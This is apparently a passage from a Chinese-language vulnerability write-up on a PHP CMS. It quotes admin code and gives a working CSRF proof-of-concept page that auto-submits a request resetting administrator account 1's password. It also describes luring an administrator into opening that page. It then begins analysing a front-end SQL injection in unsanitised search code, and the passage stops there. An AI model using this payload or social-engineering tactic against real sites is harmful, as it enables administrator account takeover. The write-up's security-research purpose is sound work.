admin/moudle/basic/deal.php
function add_admin() { global $global,$smarty; $adm_username = post('adm_username'); $adm_password = post('adm_password'); $re_password = post('re_password'); $obj = new admin(); $obj->set_where('adm_id = '.$global['admin_id']); $one = $obj->get_one(); $adm_grade = $one['adm_grade'] + 1; $obj->set_where(''); $obj->set_where("adm_username = '$adm_username'"); if($obj->get_count() == 0 && strlen($adm_username) >= 5 && strlen($adm_password) >= 5 && $adm_password == $re_password) { $obj->set_value('adm_username',$adm_username); $obj->set_value('adm_password',md5($adm_password)); $obj->set_value('adm_grade',$adm_grade); $obj->add(); $info_text = '添加管理员帐号成功'; $link_text = '返回列表页'; $link_href = url(array('channel'=>'basic','mod'=>'admin_list')); }else{ $info_text = '添加管理员帐号失败'; $link_text = '返回上一页'; $link_href = url(array('channel'=>'basic','mod'=>'admin_add')); } $smarty->assign('info_text',$info_text); $smarty->assign('link_text',$link_text); $smarty->assign('link_href',$link_href); } 漏洞利用修改管理员密码为:Passw0rd 构造以下HTML页面:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.12/admin.php?/basic/index.html" method="POST"> <input type="hidden" name="cmd" value="edit_admin" /> <input type="hidden" name="adm_id" value="1" /> <input type="hidden" name="adm_password" value="Passw0rd" /> <input type="hidden" name="re_password" value="Passw0rd" /> </form> <script> document.forms[0].submit(); </script> </body> </html>下面实际来模拟一下攻击场景
攻击者将上述html保存到外网上,引诱管理员点击,然后自动触发CSRF攻击:
管理员在后台 使用当前浏览器去访问这个地址的时候就中招了,这个html里面的修改密码表单会自动触发,GG
前台盲注前面漏洞要么需要拿到后台,要么需要社工来CSRF攻击管理员,需要一些运气成分,但是这个洞就不需要了,这个洞产生点在网站的前台,可以直接进行注入。
漏洞分析index/module/search_main.php
<?php function module_search_main() { global $global,$smarty; $global['key'] = rawurldecode($global['key']); $obj = new goods(); $obj->set_field('goo_id,goo_title,goo_x_img'); $obj->set_where("goo_title like '%" . $global['key'] . "%'"); $obj->set_where('goo_channel_id = '.get_id('channel','cha_code','goods')); $len = get_varia('img_list_len'); $obj->set_page_size($len ? $len : 12); $obj->set_page_num($global['page']); $sheet = $obj->get_sheet(); for($i = 0; $i < count($sheet); $i ++) { $sheet[$i]['short_title'] = cut_str($sheet[$i]['goo_title'],10); } set_link($obj->get_page_sum()); $smarty->assign('search',$sheet); } //新秀 ?>这里首先进行URL解码:
$global['key'] = rawurldecode($global['key']);